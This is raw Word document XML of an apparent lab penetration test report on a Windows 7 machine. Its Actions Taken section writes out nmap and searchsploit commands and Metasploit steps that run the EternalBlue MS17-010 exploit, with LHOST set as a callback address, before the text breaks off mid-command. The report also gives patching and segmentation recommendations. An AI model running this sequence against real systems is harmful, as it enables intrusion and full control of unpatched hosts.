    <w:p w14:paraId="75E2C0F4" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The successful exploitation of the MS17-010 vulnerability indicates a severe risk to the target system. This vulnerability allows for full system control, making it highly </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>likely that an attacker could compromise sensitive data or launch further attacks within the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72965A64" w14:textId="3907769B" w:rsidR="00364EFA" w:rsidRPr="00DC3DEF" w:rsidRDefault="00364EFA" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5DD8E5" wp14:editId="23BF3043">
            <wp:extent cx="5539105" cy="4325620"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1080991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1349" name="Picture 1080991349"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5539105" cy="4325620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="171147C8" w14:textId="229513CB" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc175499460"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Prioritized Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0CFB6FF1" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Immediate patching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the MS17-010 vulnerability using the latest security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25023171" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to isolate vulnerable systems and limit the spread of potential attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F7B10" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Regular vulnerability assessments</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify and mitigate emerging threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18910BCD" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="7DFE3100">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E7C09" w14:textId="1217B806" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00DC3DEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc175499461"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Test Scope and Method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="02692078" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The test focused on identifying vulnerabilities within the Windows 7 Professional machine. The MS17-010 vulnerability was specifically targeted, as it is well-documented and presents a high risk. Metasploit’s msfconsole was used to conduct the test, simulating real-world attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F3BBE" w14:textId="49FF4C5F" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc175499462"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Extent of Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="61739894" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The testing involved both automated and manual techniques, including the use of vulnerability scanners and exploit frameworks. The primary goal was to assess the system’s resilience to common attack vectors, with a focus on the MS17-010 vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB14B38" w14:textId="41178021" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc175499463"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Test Scope Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6E9F7AEF" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The scope was limited to internal network testing, focusing on a single Windows 7 Professional machine. The MS17-010 vulnerability was the primary target due to its high severity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C099F" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="1BAAD1ED">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A210E" w14:textId="2726A609" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00DC3DEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc175499464"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Internal Phase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="17E2FF83" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The internal phase involved scanning the system for known vulnerabilities and attempting exploitation. The primary focus was on identifying and exploiting the MS17-010 vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A710DDE" w14:textId="29EB89C5" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc175499465"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Phase Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5E2DF036" w14:textId="18AA7BC2" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="006A7B84" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A basic reconnaissance was carried out with nmap and the system was found vulnerable to the MS17-010 exploit which is present in Metasploit framework.</w:t>
      </w:r>
      <w:r w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The internal assessment revealed that the MS17-010 vulnerability was present and </w:t>
      </w:r>
      <w:r w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>unpatched, making the system highly susceptible to attacks. The vulnerability was successfully exploited, allowing for remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23653D7B" w14:textId="453C0328" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc175499466"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> Actions Taken</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="47A454BB" w14:textId="1BBCC863" w:rsidR="002B6769" w:rsidRPr="00DC3DEF" w:rsidRDefault="002B6769" w:rsidP="006A7B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Arp-scan was utilised to identify the devices connected to the interface eth0 and nmap was run  with -O flag to identify the windows machine’s IP(192.168.56.104).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31020732" w14:textId="499E3675" w:rsidR="002B6769" w:rsidRPr="002B6769" w:rsidRDefault="002B6769" w:rsidP="002B6769">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spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6769">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>sudo arp-scan -I -l eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B746D4" w14:textId="505C9963" w:rsidR="002B6769" w:rsidRPr="002B6769" w:rsidRDefault="002B6769" w:rsidP="002B6769">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spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6769">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>sudo nmap -O 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278136CA" w14:textId="11552048" w:rsidR="002B6769" w:rsidRPr="00DC3DEF" w:rsidRDefault="002B6769" w:rsidP="002B6769">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C42A60" wp14:editId="44BFE24A">
            <wp:extent cx="5539105" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="1686971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71226" name="Picture 16869712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9105" cy="2830195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0E048" w14:textId="04F671F7" w:rsidR="006A7B84" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="006A7B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Used Nmap  to identify open ports and services</w:t>
      </w:r>
      <w:r w:rsidR="006A7B84" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and list possible exploits and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00E96207">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. The output of the scan was stored in vuln-win7.txt for further reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958DF04" w14:textId="3C55A288" w:rsidR="002B6769" w:rsidRPr="002B6769" w:rsidRDefault="002B6769" w:rsidP="002B6769">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spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6769">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo nmap -Pn -sV –script vuln -oN vuln-win7.txt 192.168.56.104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C491A91" wp14:editId="6BCD79A0">
            <wp:extent cx="4495800" cy="2861945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8867358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35818" name="Picture 8867358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95800" cy="2861945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A0EE8" w14:textId="77777777" w:rsidR="006A7B84" w:rsidRPr="00DC3DEF" w:rsidRDefault="006A7B84" w:rsidP="002B6769">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2418E5D9" w14:textId="5CD8B463" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="002B6769" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he presence of the MS17-010 vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was confirmed based on the nmap scan results.</w:t>
      </w:r>
      <w:r w:rsidR="00642D77" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On browsing exploit databases for the particular vulnerability, it was found that the exploit is a part of msf console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CF3C2" w14:textId="77777777" w:rsidR="005C647A" w:rsidRPr="005C647A" w:rsidRDefault="005C647A" w:rsidP="005C647A">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5C647A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>searchsploit smb-vuln-ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA74893" w14:textId="0EF1889B" w:rsidR="005C647A" w:rsidRDefault="005C647A" w:rsidP="005C647A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42935119" w14:textId="5EBAA64F" w:rsidR="00642D77" w:rsidRPr="00DC3DEF" w:rsidRDefault="00642D77" w:rsidP="00642D77">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398B04AF" wp14:editId="0BB0BE95">
            <wp:extent cx="5539105" cy="2540000"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1530099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230" name="Picture 153009923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9105" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3676CB" w14:textId="0A278506" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Leveraged Metasploit’s msfconsole to exploit the vulnerability, gaining full control of the system</w:t>
      </w:r>
      <w:r w:rsidR="00642D77" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> eventually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34FD66" w14:textId="30A7A172" w:rsidR="00642D77" w:rsidRPr="00840D82" w:rsidRDefault="00642D77"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sudo msfconsole -q</w:t>
      </w:r>
      <w:r w:rsidR="005C647A" w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> #starting msfconsole in quiet mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E47BF6" w14:textId="77777777" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A"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search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF19DC8" w14:textId="42F1D3C2" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A"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use 0 #opting for EternalBlue remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EC8D7" w14:textId="77777777" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A"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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D88D076" w14:textId="77777777" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A"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 xml:space="preserve"> set RHOST 192.168.56.104 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DABC003" w14:textId="64A04FFB" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A"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 xml:space="preserve"> set LHOST 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C9297" w14:textId="6FEB1DE1" w:rsidR="005C647A" w:rsidRPr="00840D82" w:rsidRDefault="005C647A" w:rsidP="00840D82">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#payload was auto-selected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C675D1" w14:textId="55757265" w:rsidR="006669DA" w:rsidRDefault="006669DA" w:rsidP="006669DA">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sidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="005C647A" w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
